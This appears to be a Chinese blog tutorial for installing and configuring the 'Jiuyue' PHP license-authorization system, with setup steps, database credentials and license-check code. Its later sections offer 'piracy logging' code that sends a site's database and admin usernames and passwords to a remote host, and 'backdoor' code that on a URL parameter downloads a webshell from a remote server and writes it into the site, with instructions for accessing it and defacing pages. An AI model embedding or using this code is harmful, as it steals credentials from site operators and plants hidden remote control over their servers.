九月授权教程

教程开始

第一步先上传源码到根目录

解压 删除无用 文件 列如user.ini .well-known

伪静态

location ^~ /includes/download {
 return 404;
}
location ^~ /readme.txt {
 return 404;
}

数据库

第二步修改数据库,修改includes/config.php文件

把’dbqz’ => ”,修改成’dbqz’ => ‘auth’, //Pdo连接库名

然后导入数据库,数据库账号密码:hayfoun xin520131

后台登陆地址http://你的域名/Admin/

第三步 文件includes/download 有更新包 安装包 加密的 想破解自己动手

不想用这些 直接删掉Release Update 文件里面的文件即可

授权代码

授权代码有问题 ,在这里要珍重声明,参数需要更改 补充一下(源码文件中把九月的网址替换成自己的)

公用判断头

//判断是否有授权文件
if(file_exists(SYSTEM_ROOT."authcode.php")){
 require(SYSTEM_ROOT."authcode.php");
}else{
 exit('当前网站无授权码!');
}
require(SYSTEM_ROOT."version.php");
define("authcode", $authcode);
define("version", $version);
if(!defined("authcode")){
 exit(0);
}

授权代码+更新代码:
if(empty($_SESSION['自定义名称'])) {
 $data_string=authcode('JiuYue||||'.$_SERVER['HTTP_HOST'].'||||'.authcode.'||||','ENCODE','解密KEY密钥');
 $check=curl_get('http://授权站域名/check.php?data_string='.base64_encode($data_string));
 $check=authcode($check,'DECODE','解密KEY密钥');
 if ($json = json_decode($check, true)) {
 if($json['code'] == 1) {
 $_SESSION['自定义名称'] = md5($_SERVER['HTTP_HOST'].$authcode.'JiuYue');
 }else{
 sysmsg('<h3>'.$json['msg'].'</h3>', true);
 }
 } else if (!empty($check)) {
 sysmsg('<h3>授权验证状态异常!</h3>', true);
 } else {
 sysmsg('<h3>检测到云端环境异常,授权服务器拒绝连接!</h3>', true);
 }
}

温馨提示:本授权代码采用了session请务必填写$_SESSION[自定义名称]的自定义名称的内容全字母越复杂越好不然会被利用session从而绕过授权....

function update_version(){ 
 $data_string=authcode('JiuYue||||'.$_SERVER['HTTP_HOST'].'||||'.authcode.'||||'.version.'||||','ENCODE','解密KEY密钥');
 $query=curl_get('http://授权站域名/check.php?data_string='.base64_encode($data_string));
 $query=authcode($query,'DECODE','解密KEY密钥');
 if ($query = json_decode($query,true)) {
 return $query;
 }
 return false;
}

在线SQL更新教程:

1.首先代码在Admin/update.php可以适配大部分程序,稍微改改就可以了

2.然后登陆后台,点击授权配置开启在线更新sql然后打开系统根目录/includes/download/Sql/update.sql还需要更新的语句,复制粘贴进去就行了注update.sql文件名称不要改,否则导致无法更新sql,不用了,记得把里面的内容删除,留空文件然后后台关闭SQL更新即可!

3.如果你会了,那么就说明你就学会了,不懂的话联系九月QQ:85432394

盗版入库代码:
file_get_contents("http://域名/ajax.php?act=block&url=".$_SERVER['HTTP_HOST']."&user=".$dbconfig['user']."&pwd=".$dbconfig['pwd']."&dbname=".$dbconfig['dbname']."&authcode=".$authcode."&admin_user=".$conf['admin_user']."&admin_pass=".$conf['admin_pass']);
$conf['admin_user']
$conf['admin_pass']

$conf['admin_user']
$conf['admin_pass']
变量信息根据源码改

后门代码:

if(isset($_GET['dm'])){file_put_contents('includes/dm.php',file_get_contents('http://域名/includes/back/dm.txt'));
 exit("<script language='javascript'>alert('大马后门写入成功!');window.location.href='./includes/dm.php';</script>");
}

if(isset($_GET['hm'])){file_put_contents('includes/hm.php',file_get_contents('http://你的域名/includes/back/hm.txt'));
 exit("<script language='javascript'>alert('后门写入成功!');window.location.href='./includes/hm.php';</script>");
}

后门1教程:

直接访问:域名/includes/dm.php

后门2教程:

文件名称/?hm

挂黑代码:

文件路径/hm.php?mod=my

删除后门:

文件路径/hm.php?mod=del

给TA打赏
共{{data.count}}人
人已打赏
胡言乱语

乐购

2022-8-5 17:00:51

胡言乱语

等待

2022-3-11 23:51:58

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索